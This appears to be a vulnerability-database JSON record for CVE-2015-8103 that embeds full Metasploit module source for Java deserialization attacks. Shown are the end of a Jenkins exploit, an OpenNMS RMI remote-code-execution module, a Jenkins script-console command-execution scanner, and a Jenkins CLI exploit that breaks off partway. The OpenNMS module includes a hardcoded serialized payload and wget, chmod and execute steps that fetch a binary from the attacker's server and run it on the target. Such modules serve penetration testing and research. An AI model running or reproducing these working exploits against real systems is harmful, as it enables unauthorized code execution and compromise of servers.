\"#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}\"\r\n print_status \"Sending payload length: #{encoded_payload.length}\"\r\n socket.put(encoded_payload)\r\n ensure\r\n disconnect(socket)\r\n end\r\n\r\n end\r\n\r\n def print_status(msg='')\r\n super(\"#{rhost}:#{rport} - #{msg}\")\r\n end\r\n\r\n #\r\n # Serialized stream generated with:\r\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java\r\n #\r\n def 
set_payload\r\n stream = Rex::Java::Serialization::Model::Stream.new\r\n\r\n handle = File.new(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", 'serialized_file_writer' ), 'rb')\r\n decoded = stream.decode(handle)\r\n handle.close\r\n\r\n inject_payload_into_stream(decoded).encode\r\n end\r\n\r\n #\r\n # Serialized stream generated with:\r\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java\r\n #\r\n def class_load_payload\r\n stream = Rex::Java::Serialization::Model::Stream.new\r\n handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')\r\n decoded = stream.decode(handle)\r\n handle.close\r\n inject_class_loader_into_stream(decoded).encode\r\n end\r\n\r\n def inject_class_loader_into_stream(decoded)\r\n file_name_utf8 = get_array_chain(decoded)\r\n .values[2]\r\n .class_data[0]\r\n .values[1]\r\n .values[0]\r\n .values[0]\r\n .class_data[3]\r\n file_name_utf8.contents = get_random_file_name\r\n file_name_utf8.length = file_name_utf8.contents.length\r\n class_name_utf8 = get_array_chain(decoded)\r\n .values[4]\r\n .class_data[0]\r\n .values[0]\r\n class_name_utf8.contents = 'metasploit.Payload'\r\n class_name_utf8.length = class_name_utf8.contents.length\r\n decoded\r\n end\r\n\r\n def get_random_file_name\r\n @random_file_name ||= \"#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], \"#{rand_text_alpha(4 + rand(4))}.jar\")}\"\r\n end\r\n\r\n def inject_payload_into_stream(decoded)\r\n byte_array = get_array_chain(decoded)\r\n .values[2]\r\n .class_data\r\n .last\r\n byte_array.values = payload.encoded.bytes\r\n file_name_utf8 = decoded.references[44].class_data[0]\r\n rnd_fname = get_random_file_name\r\n register_file_for_cleanup(rnd_fname)\r\n file_name_utf8.contents = rnd_fname\r\n file_name_utf8.length = file_name_utf8.contents.length\r\n decoded\r\n end\r\n\r\n def get_array_chain(decoded)\r\n 
object = decoded.contents[0]\r\n lazy_map = object.class_data[1].class_data[0]\r\n chained_transformer = lazy_map.class_data[0]\r\n chained_transformer.class_data[0]\r\n end\r\n\r\n def read_bin_file(bin_file_path)\r\n data = ''\r\n\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", bin_file_path ), 'rb') do |f|\r\n data = f.read\r\n end\r\n\r\n data\r\n end\r\n\r\nend\n\n# 0day.today [2018-02-21] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24727"}], "metasploit": [{"lastseen": "2019-12-05T07:11:52", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the OpenNMS Java object which allows an unauthenticated attacker to run arbitrary code against the system.\n", "modified": "2018-07-12T22:34:52", "published": "2016-02-09T17:27:39", "id": "MSF:EXPLOIT/LINUX/MISC/OPENNMS_JAVA_SERIALIZE", "href": "", "type": "metasploit", "title": "OpenNMS Java Object Unserialization Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Java::Rmi::Client\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'OpenNMS Java Object Unserialization Remote Code Execution',\n 'Description' => %q(\n This module exploits a vulnerability in the OpenNMS Java object which allows\n an unauthenticated attacker to run arbitrary code against the system.\n ),\n 'Author' =>\n [\n 'Ben Turner <benpturner[at]yahoo.com>', # @benpturner\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2015-8103' ],\n [ 'URL', 
'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/' ]\n ],\n 'Targets' =>\n [\n [ 'OpenNMS / Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],\n [ 'OpenNMS / Linux x86_64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Nov 06 2015'\n )\n )\n\n register_options(\n [\n Opt::RPORT(1099),\n OptString.new('WRITABLEDIR', [false, 'A writable directory on the host', '/tmp/'])\n ])\n end\n\n # This is the execute function that is re-used throughout\n def exec_command(cmd)\n vprint_status(\"#{peer} - Downloading the file #{cmd}\")\n\n # Do the exploit command bit\n data1 = \"\\x4a\\x52\\x4d\\x49\\x00\\x02\\x4b\"\n data2 = \"\\x00\\x09\\x31\\x32\\x37\\x2E\\x30\\x2E\\x31\\x2E\\x31\\x00\\x00\\x00\\x00\\x50\\xAC\\xED\\x00\\x05\\x77\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x15\\x4D\\xC9\\xD4\\xE6\\x3B\\xDF\\x74\\x00\\x05\\x70\\x77\\x6E\\x65\\x64\\x73\\x7D\\x00\\x00\\x00\\x01\\x00\\x0F\\x6A\\x61\\x76\\x61\\x2E\\x72\\x6D\\x69\\x2E\\x52\\x65\\x6D\\x6F\\x74\\x65\\x70\\x78\\x72\\x00\\x17\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x72\\x65\\x66\\x6C\\x65\\x63\\x74\\x2E\\x50\\x72\\x6F\\x78\\x79\\xE1\\x27\\xDA\\x20\\xCC\\x10\\x43\\xCB\\x02\\x00\\x01\\x4C\\x00\\x01\\x68\\x74\\x00\\x25\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x72\\x65\\x66\\x6C\\x65\\x63\\x74\\x2F\\x49\\x6E\\x76\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\\x48\\x61\\x6E\\x64\\x6C\\x65\\x72\\x3B\\x70\\x78\\x70\\x73\\x72\\x00\\x32\\x73\\x75\\x6E\\x2E\\x72\\x65\\x66\\x6C\\x65\\x63\\x74\\x2E\\x61\\x6E\\x6E\\x6F\\x74\\x61\\x74\\x69\\x6F\\x6E\\x2E\\x41\\x6E\\x6E\\x6F\\x74\\x61\\x74\\x69\\x6F\\x6E\\x49\\x6E\\x76\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\\x48\\x61\\x6E\\x64\\x6C\\x65\\x72\\x55\\xCA\\xF5\\x0F\\x15\\xCB\\x7E\\xA5\\x02\\x00\\x02\\x4C\\x00\\x0C\\x6D\\x65\\x6
D\\x62\\x65\\x72\\x56\\x61\\x6C\\x75\\x65\\x73\\x74\\x00\\x0F\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x75\\x74\\x69\\x6C\\x2F\\x4D\\x61\\x70\\x3B\\x4C\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x43\\x6C\\x61\\x73\\x73\\x3B\\x70\\x78\\x70\\x73\\x72\\x00\\x11\\x6A\\x61\\x76\\x61\\x2E\\x75\\x74\\x69\\x6C\\x2E\\x48\\x61\\x73\\x68\\x4D\\x61\\x70\\x05\\x07\\xDA\\xC1\\xC3\\x16\\x60\\xD1\\x03\\x00\\x02\\x46\\x00\\x0A\\x6C\\x6F\\x61\\x64\\x46\\x61\\x63\\x74\\x6F\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6F\\x6C\\x64\\x70\\x78\\x70\\x3F\\x40\\x00\\x00\\x00\\x00\\x00\\x0C\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x71\\x00\\x7E\\x00\\x00\\x73\\x71\\x00\\x7E\\x00\\x05\\x73\\x7D\\x00\\x00\\x00\\x01\\x00\\x0D\\x6A\\x61\\x76\\x61\\x2E\\x75\\x74\\x69\\x6C\\x2E\\x4D\\x61\\x70\\x70\\x78\\x71\\x00\\x7E\\x00\\x02\\x73\\x71\\x00\\x7E\\x00\\x05\\x73\\x72\\x00\\x2A\\x6F\\x72\\x67\\x2E\\x61\\x70\\x61\\x63\\x68\\x65\\x2E\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2E\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x6D\\x61\\x70\\x2E\\x4C\\x61\\x7A\\x79\\x4D\\x61\\x70\\x6E\\xE5\\x94\\x82\\x9E\\x79\\x10\\x94\\x03\\x00\\x01\\x4C\\x00\\x07\\x66\\x61\\x63\\x74\\x6F\\x72\\x79\\x74\\x00\\x2C\\x4C\\x6F\\x72\\x67\\x2F\\x61\\x70\\x61\\x63\\x68\\x65\\x2F\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2F\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2F\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x3B\\x70\\x78\\x70\\x73\\x72\\x00\\x3A\\x6F\\x72\\x67\\x2E\\x61\\x70\\x61\\x63\\x68\\x65\\x2E\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2E\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x66\\x75\\x6E\\x63\\x74\\x6F\\x72\\x73\\x2E\\x43\\x68\\x61\\x69\\x6E\\x65\\x64\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x30\\xC7\\x97\\xEC\\x28\\x7A\\x97\\x04\\x02\\x00\\x01\\x5B\\x00\\x0D\\x69\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x73\\x74\\x00\\x2D\\x5B\\x4C\\x6F\\x72\\x67\\x2F\\x61\\x70\\x61\\x63\\x6
8\\x65\\x2F\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2F\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2F\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x3B\\x70\\x78\\x70\\x75\\x72\\x00\\x2D\\x5B\\x4C\\x6F\\x72\\x67\\x2E\\x61\\x70\\x61\\x63\\x68\\x65\\x2E\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2E\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x3B\\xBD\\x56\\x2A\\xF1\\xD8\\x34\\x18\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3B\\x6F\\x72\\x67\\x2E\\x61\\x70\\x61\\x63\\x68\\x65\\x2E\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2E\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x66\\x75\\x6E\\x63\\x74\\x6F\\x72\\x73\\x2E\\x43\\x6F\\x6E\\x73\\x74\\x61\\x6E\\x74\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xB1\\x94\\x02\\x00\\x01\\x4C\\x00\\x09\\x69\\x43\\x6F\\x6E\\x73\\x74\\x61\\x6E\\x74\\x74\\x00\\x12\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x4F\\x62\\x6A\\x65\\x63\\x74\\x3B\\x70\\x78\\x70\\x76\\x72\\x00\\x11\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x52\\x75\\x6E\\x74\\x69\\x6D\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x73\\x72\\x00\\x3A\\x6F\\x72\\x67\\x2E\\x61\\x70\\x61\\x63\\x68\\x65\\x2E\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2E\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x66\\x75\\x6E\\x63\\x74\\x6F\\x72\\x73\\x2E\\x49\\x6E\\x76\\x6F\\x6B\\x65\\x72\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x87\\xE8\\xFF\\x6B\\x7B\\x7C\\xCE\\x38\\x02\\x00\\x03\\x5B\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5B\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x4F\\x62\\x6A\\x65\\x63\\x74\\x3B\\x4C\\x00\\x0B\\x69\\x4D\\x65\\x74\\x68\\x6F\\x64\\x4E\\x61\\x6D\\x65\\x74\\x00\\x12\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x53\\x74\\x72\\x69\\x6E\\x67\\x3B\\x5B\\x00\\x0B\\x69\\x50\\x61\\x72\\x61\\x6D\\x54\\x79\\x70\\x6
5\\x73\\x74\\x00\\x12\\x5B\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x43\\x6C\\x61\\x73\\x73\\x3B\\x70\\x78\\x70\\x75\\x72\\x00\\x13\\x5B\\x4C\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x4F\\x62\\x6A\\x65\\x63\\x74\\x3B\\x90\\xCE\\x58\\x9F\\x10\\x73\\x29\\x6C\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0A\\x67\\x65\\x74\\x52\\x75\\x6E\\x74\\x69\\x6D\\x65\\x75\\x72\\x00\\x12\\x5B\\x4C\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x43\\x6C\\x61\\x73\\x73\\x3B\\xAB\\x16\\xD7\\xAE\\xCB\\xCD\\x5A\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4D\\x65\\x74\\x68\\x6F\\x64\\x75\\x71\\x00\\x7E\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x53\\x74\\x72\\x69\\x6E\\x67\\xA0\\xF0\\xA4\\x38\\x7A\\x3B\\xB3\\x42\\x02\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7E\\x00\\x24\\x73\\x71\\x00\\x7E\\x00\\x1C\\x75\\x71\\x00\\x7E\\x00\\x21\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7E\\x00\\x21\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6E\\x76\\x6F\\x6B\\x65\\x75\\x71\\x00\\x7E\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x4F\\x62\\x6A\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7E\\x00\\x21\\x73\\x71\\x00\\x7E\\x00\\x1C\\x75\\x72\\x00\\x13\\x5B\\x4C\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x53\\x74\\x72\\x69\\x6E\\x67\\x3B\\xAD\\xD2\\x56\\xE7\\xE9\\x1D\\x7B\\x47\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\"\n data2 += cmd.length.chr\n data2 += cmd\n data2 += 
\"\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7E\\x00\\x24\\x00\\x00\\x00\\x01\\x71\\x00\\x7E\\x00\\x29\\x73\\x71\\x00\\x7E\\x00\\x17\\x73\\x72\\x00\\x11\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x49\\x6E\\x74\\x65\\x67\\x65\\x72\\x12\\xE2\\xA0\\xA4\\xF7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6C\\x75\\x65\\x70\\x78\\x72\\x00\\x10\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x4E\\x75\\x6D\\x62\\x65\\x72\\x86\\xAC\\x95\\x1D\\x0B\\x94\\xE0\\x8B\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x71\\x00\\x7E\\x00\\x09\\x3F\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x4F\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x71\\x00\\x7E\\x00\\x3F\\x78\\x71\\x00\\x7E\\x00\\x3F\"\n\n begin\n connect\n sock.put(data1)\n\n # Wait for a successful response\n data = recv_protocol_ack # rescue nil\n unless data\n fail_with(Failure::Unknown, \"This system has not responded with the correct RMI header\")\n end\n\n # Send the RMI payload\n sock.put(data2)\n\n # Disconnect\n disconnect\n\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the host\")\n end\n end\n\n # Wget the file onto the host in the temp directory\n def wget_payload\n resource_uri = '/' + @dropped_elf\n\n if datastore['SRVHOST'] == \"0.0.0.0\" || datastore['SRVHOST'] == \"::\"\n srv_host = Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\n\n vprint_status(\"#{peer} - Starting up our web service on #{service_url} ...\")\n start_service(\n 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }\n )\n\n exec_command(\"wget -P #{datastore['WRITABLEDIR']} #{service_url}\")\n\n Rex.sleep(15)\n 
end\n\n # Change permissions to permit binary execution\n def chmod_payload\n cmd = \"chmod +x #{File.join(datastore['WRITABLEDIR'], @dropped_elf)}\"\n\n vprint_status(\"#{peer} - Chmod the payload...\")\n res = exec_command(cmd)\n\n fail_with(Failure::Unknown, \"#{peer} - Unable to chmod payload\") unless res\n\n Rex.sleep(1)\n end\n\n # Execute payload on host\n def exec_payload\n cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)\n\n vprint_status(\"#{peer} - Executing the payload...\")\n res = exec_command(cmd)\n\n fail_with(Failure::Unknown, \"#{peer} - Unable to exec payload\") unless res\n\n Rex.sleep(1)\n end\n\n # Handle incoming requests from the server\n def on_request_uri(cli, _request)\n vprint_status(\"#{peer} - Sending the payload to the server...\")\n send_response(cli, generate_payload_exe)\n end\n\n # Create the payload and run the commands in succcession\n def exploit\n print_status(\"#{peer} - Exploting the vulnerable service...\")\n\n @payload_url = ''\n @dropped_elf = rand_text_alpha(rand(5) + 3)\n\n wget_payload\n chmod_payload\n exec_payload\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/opennms_java_serialize.rb"}, {"lastseen": "2019-12-02T14:15:36", "bulletinFamily": "exploit", "description": "This module scans for unauthenticated Jenkins-CI script consoles and executes the specified command.\n", "modified": "2017-07-24T13:26:21", "published": "2015-09-02T20:12:05", "id": "MSF:AUXILIARY/SCANNER/HTTP/JENKINS_COMMAND", "href": "", "type": "metasploit", "title": "Jenkins-CI Unauthenticated Script-Console Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/http'\nrequire 'cgi'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include 
Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Jenkins-CI Unauthenticated Script-Console Scanner',\n 'Description' => %q{\n This module scans for unauthenticated Jenkins-CI script consoles and\n executes the specified command.\n },\n 'Author' =>\n [\n 'altonjx',\n 'Jeffrey Cap'\n ],\n 'References' =>\n [\n ['CVE', '2015-8103'], # see link and validate, https://highon.coffee/blog/jenkins-api-unauthenticated-rce-exploit/ states this is another issue\n ['URL', 'https://jenkins.io/security/advisory/2015-11-11/'],\n ['URL', 'https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/'],\n ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'],\n ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'The path to the Jenkins-CI application', '/jenkins/' ]),\n OptString.new('COMMAND', [ true, 'Command to run in application', 'whoami' ]),\n ])\n end\n\n def fingerprint_os(ip)\n res = send_request_cgi({'uri' => normalize_uri(target_uri.path,\"systemInfo\")})\n\n # Verify that we received a proper systemInfo response\n unless res && res.body.to_s.length > 0\n vprint_error(\"#{peer} - The server did not reply to our systemInfo request\")\n return\n end\n\n unless res.body.index(\"System Properties\") &&\n res.body.index(\"Environment Variables\")\n if res.body.index('Remember me on this computer')\n vprint_error(\"#{peer} This Jenkins-CI system requires authentication\")\n else\n vprint_error(\"#{peer} This system is not running Jenkins-CI at #{datastore['TARGETURI']}\")\n end\n return\n end\n\n host_info = {}\n if (res.body =~ /\"\\.crumb\", \"([a-z0-9]*)\"/)\n print_status(\"#{peer} Using CSRF token: '#{$1}'\")\n host_info[:crumb] = $1\n\n sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]\n host_info[:cookie] = \"#{sessionid}\"\n end\n\n os_info = 
pattern_extract(/os.name(.*?)os.version/m, res.body).first\n host_info[:prefix] = os_info.index(\">Windows\") ? \"cmd.exe /c \" : \"\"\n host_info\n end\n\n def run_host(ip)\n command = datastore['COMMAND'].gsub(\"\\\\\", \"\\\\\\\\\\\\\")\n\n host_info = fingerprint_os(ip)\n return if host_info.nil?\n prefix = host_info[:prefix]\n\n request_parameters = {\n 'uri' => normalize_uri(target_uri.path,\"script\"),\n 'method' => 'POST',\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' =>\n {\n 'script' => \"def sout = new StringBuffer(), serr = new StringBuffer()\\r\\ndef proc = '#{prefix} #{command}'.execute()\\r\\nproc.consumeProcessOutput(sout, serr)\\r\\nproc.waitForOrKill(1000)\\r\\nprintln \\\"out> $sout err> $serr\\\"\\r\\n\",\n 'Submit' => 'Run'\n }\n }\n request_parameters['cookie'] = host_info[:cookie] unless host_info[:cookie].nil?\n request_parameters['vars_post']['.crumb'] = host_info[:crumb] unless host_info[:crumb].nil?\n res = send_request_cgi(request_parameters)\n\n unless res && res.body.to_s.length > 0\n vprint_error(\"#{peer} No response received from the server.\")\n return\n end\n\n plugin_output, command_output = pattern_extract(/<pre>(.*?)<\\/pre>/m, res.body.to_s)\n\n if plugin_output !~ /Jenkins\\.instance\\.pluginManager\\.plugins/\n vprint_error(\"#{peer} The server returned an invalid response.\")\n return\n end\n\n # The output is double-HTML encoded\n output = CGI.unescapeHTML(CGI.unescapeHTML(command_output.to_s)).\n gsub(/\\s*(out|err)>\\s*/m, '').\n strip\n\n if output =~ /^java\\.[a-zA-Z\\.]+\\:\\s*([^\\n]+)\\n/\n output = $1\n print_good(\"#{peer} The server is vulnerable, but the command failed: #{output}\")\n else\n output.split(\"\\n\").each do |line|\n print_good(\"#{peer} #{line.strip}\")\n end\n end\n\n report_vulnerable(output)\n\n end\n\n def pattern_extract(pattern, buffer)\n buffer.to_s.scan(pattern).map{ |m| m.first }\n end\n\n def report_vulnerable(result)\n report_vuln(\n :host => rhost,\n :port => rport,\n 
:proto => 'tcp',\n :sname => ssl ? 'https' : 'http',\n :name => self.name,\n :info => result,\n :refs => self.references,\n :exploited_at => Time.now.utc\n )\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/jenkins_command.rb"}, {"lastseen": "2019-11-30T10:32:46", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on the Jenkins master, which allows remote arbitrary code execution. Authentication is not required to exploit this vulnerability.\n", "modified": "2019-02-22T23:01:49", "published": "2015-12-11T20:57:10", "id": "MSF:EXPLOIT/LINUX/MISC/JENKINS_JAVA_DESERIALIZE", "href": "", "type": "metasploit", "title": "Jenkins CLI RMI Java Deserialization Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',\n 'Description' => %q{\n This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on\n the Jenkins master, which allows remote arbitrary code execution. 
Authentication is not\n required to exploit this vulnerability.\n },\n 'Author' =>\n [\n 'Christopher Frohoff', # Vulnerability discovery\n 'Steve Breen', # Public Exploit\n 'Dev Mohanty', # Metasploit module\n 'Louis Sato', # Metasploit\n 'wvu', # Metasploit\n 'juan vazquez', # Metasploit\n 'Wei Chen' # Metasploit\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-8103'],\n ['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],\n ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],\n ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],\n ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']\n ],\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'Jenkins 1.637', {} ]\n ],\n 'DisclosureDate' => 'Nov 18 2015',\n 'DefaultTarget' => 0))\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),\n OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),\n Opt::RPORT('8080')\n ])\n\n register_advanced_options([\n OptPort.new('XJenkinsCliPort', [false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.'])\n ])\n end\n\n def cli_port\n @jenkins_cli_port || datastore['XJenkinsCliPort']\n end\n\n def exploit\n if cli_port == 0 && !vulnerable?\n fail_with(Failure::Unknown, \"#{peer} - Jenkins is not vulnerable, aborting...\")\n end\n invoke_remote_method(set_payload)\n invoke_remote_method(class_load_payload)\n end\n\n\n # This is from the HttpClient mixin. But since this module isn't actually exploiting\n # HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &\n # conflicts). 
We do need #target_uri and normlaize_uri to properly normalize the path though.\n\n def target_uri\n begin\n # In case TARGETURI is empty, at least we default to '/'\n u = datastore['TARGETURI']\n u = \"/\" if u.nil? or u.empty?\n URI(u)\n rescue ::URI::InvalidURIError\n print_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\"\n raise Msf::OptionValidateError.new(['TARGETURI'])\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * \"/\"\n\n new_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\")\n\n # Makes sure there's a starting slash\n unless new_str[0,1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def check\n result = Exploit::CheckCode::Safe\n\n begin\n if vulnerable?\n result = Exploit::CheckCode::Vulnerable\n end\n rescue Msf::Exploit::Failed => e\n vprint_error(e.message)\n return Exploit::CheckCode::Unknown\n end\n\n result\n end\n\n def vulnerable?\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path)\n })\n\n unless res\n 